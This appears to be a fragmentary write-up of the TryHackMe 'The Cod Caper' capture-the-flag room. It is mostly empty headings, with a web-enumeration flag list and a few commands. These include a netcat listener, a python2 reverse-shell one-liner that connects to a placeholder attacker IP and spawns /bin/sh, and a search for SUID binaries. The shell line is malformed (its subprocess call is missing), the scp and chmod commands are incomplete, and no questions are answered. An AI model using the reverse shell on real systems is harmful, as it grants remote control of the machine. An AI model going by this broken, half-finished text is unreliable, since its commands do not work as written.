Tryhackme:The Cod Caper


  1. Help me out! :)

Host Enumeration:

Useful flags:

Web Enumeration:

Useful flags:

  • x=Used to specify file extensions i.e “php,txt,html”
    — url=Used to specify which url to enumerate
    — wordlist=Used to specify which wordlist that is appended on the url path

Web Exploitation:

  1. What is the admin username?

Command Execution:

  1. How many files are in the current directory?
nc -nvlp 80
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRES",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


Method 1: SCP

Method 2: SimpleHTTPServer

scp pingu@cod:/tmp
chmod +x
find / -perm -u=s -type f 2>/dev/null


Binary-Exploitaion: Manually:

Binary Exploitation: The pwntools way:

Finishing the job:





